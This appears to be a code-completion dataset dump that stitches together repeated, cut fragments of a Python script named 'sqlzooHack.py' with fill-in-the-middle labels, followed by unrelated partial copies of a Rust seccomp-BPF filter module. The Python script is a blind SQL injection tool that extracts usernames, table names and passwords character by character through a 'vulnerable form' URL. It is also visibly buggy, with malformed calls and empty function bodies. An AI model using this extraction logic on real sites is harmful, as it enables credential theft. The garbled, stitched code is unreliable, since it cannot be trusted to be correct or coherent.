name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contatins characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
|
identifier_body
|
sqlzooHack.py
|
the charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and it's index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the charaters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
return charList
def makeDatabaseList():
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
|
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contatins characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
|
conditional_block
|
sqlzooHack.py
|
otherwise, if no characters match, that character will be skipped, and it's index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the charaters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
return charList
def makeDatabaseList():
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contatins characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0
|
prints i iff there is no character in charList that matches at position i. also raises type and value error after printing i -- printing is handled by findChar
password: string
correct password or, if len(password) = n, first n characters of password
if no characters match and wildcards are in the charList (wildCards is True), _ will be substituted in since it matches every single character.
|
random_line_split
|
|
sqlzooHack.py
|
charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and it's index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the charaters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
return charList
def makeDatabaseList():
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def
|
(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contatins characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
tableName
|
identifier_name
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS
|
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 8],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = B
|
{
return Err(Errno::EINVAL);
}
|
conditional_block
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn
|
(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 8],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
